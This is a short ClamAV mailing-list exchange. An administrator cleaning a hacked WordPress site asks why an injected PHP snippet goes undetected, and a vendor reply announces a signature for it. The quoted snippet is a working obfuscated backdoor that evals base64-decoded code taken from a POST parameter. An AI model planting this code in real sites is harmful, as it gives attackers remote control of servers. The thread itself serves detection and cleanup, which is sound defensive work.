[clamav-users] basic malware missed???

Alain Zidouemba azidouemba at sourcefire.com
Wed Mar 25 13:39:54 EDT 2015


Coverage under  the name "Php.Trojan.PCT4" will be released shortly.

Thanks,

- Alain

On Tue, Mar 24, 2015 at 5:40 PM, Steve Holdoway <steve at greengecko.co.nz>
wrote:

> Hi folks,
>
> I'm in the process of cleaning up an infected wordpress website and am
> finding a number of files that contain
>
> <?php
> $sF="PCT4BA6ODSE_";
> $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if
> (isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>
>
> Inserted at the top of the file.
>
> Surely this is something pretty simple to catch?
>
> I'/m scanning the docroot nightly, and freshclam is up to date... output
> from just run freshclam:
>
> # freshclam
> ClamAV update process started at Wed Mar 25 08:38:55 2015
> main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60,
> builder: neo)
> Downloading daily-20233.cdiff [100%]
> Downloading daily-20234.cdiff [100%]
> daily.cld updated (version: 20234, sigs: 1357485, f-level: 63, builder:
> jesler)
> bytecode.cld is up to date (version: 247, sigs: 41, f-level: 63,
> builder: dgoddard)
> Database updated (3781751 signatures) from db.au.clamav.net (IP:
> 117.104.160.194)
>
> I'm finding them by searching for the string "PCT4BA6ODSE"
>
> Shouldn't this be in there already? If there is a process to add this
> can someone please point me to the docs?
>
> Thanks,
>
>
>
> Steve
>
>
> --
> Steve Holdoway BSc(Hons) MIITP
> http://www.greengecko.co.nz
> Linkedin: http://www.linkedin.com/in/steveholdoway
> Skype: sholdowa
>
> _______________________________________________
> Help us build a comprehensive ClamAV guide:
> https://github.com/vrtadmin/clamav-faq
>
> http://www.clamav.net/contact.html#ml
>



More information about the clamav-users mailing list